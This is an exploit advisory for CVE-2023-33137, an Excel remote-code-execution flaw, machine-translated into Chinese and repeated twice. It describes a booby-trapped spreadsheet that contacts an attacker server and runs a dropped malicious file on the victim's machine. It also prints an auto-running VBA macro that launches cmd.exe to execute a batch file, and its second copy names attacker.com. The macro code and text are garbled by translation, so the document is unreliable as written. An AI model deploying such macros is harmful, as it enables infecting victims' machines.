## title:microsoft 365 MSO(版本2305构建16.0.16501.20074)32 -bit-远程代码执行(RCE)
##作者: nu11secur1ty
## date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
##参考: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
此漏洞利用与第三部分漏洞连接,该服务器等待
让受害者打电话给他并使用他执行内容
管道发布方法!这绝对是0天的利用!这是
对于被他感染的受害者来说,绝对危险!
当受害者按下Excel文件中的按钮时,它发表了一个职位
请求漏洞服务器,并且服务器正在回复该服务器
Way:他创建了另一个隐藏的恶意文件并直接执行
在受害者的机器上,一切都缺失了,所以
可恶的。
状态:高脆弱性警告:这对通常的用户非常危险!
[+] exploit:
``VBS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
maloumnici.bat。\ maloumnici.bat',vbnormalfocus)
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33137)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/microsoft-excel-excel-microsoft-365-mso.html)
##时间花费:
01:27:00
##作者: nu11secur1ty
## date: 06.27.2023
## Vendor: https://www.microsoft.com/
## Software: https://www.microsoft.com/en-us/microsoft-365/excel
##参考: https://portswigger.net/daily-swig/rce
## CVE-2023-33137
## Description:
此漏洞利用与第三部分漏洞连接,该服务器等待
让受害者打电话给他并使用他执行内容
管道发布方法!这绝对是0天的利用!这是
对于被他感染的受害者来说,绝对危险!
当受害者按下Excel文件中的按钮时,它发表了一个职位
请求漏洞服务器,并且服务器正在回复该服务器
Way:他创建了另一个隐藏的恶意文件并直接执行
在受害者的机器上,一切都缺失了,所以
可恶的。
状态:高脆弱性警告:这对通常的用户非常危险!
[+] exploit:
``VBS
sub autoopen()
致电shell('cmd.exe /s /c''卷- s
正在加载...
attacker.com
结束子
````````
##复制:
[HREF](https://github.com/nu11secur1ty/windows11exploits/tree/main/main/2023/cve-2023-33137)
##证明和Exploit:
[HREF](https://www.nu11secur1ty.com/2023/06/microsoft-excel-excel-microsoft-365-mso.html)
##时间花费:
01:27:00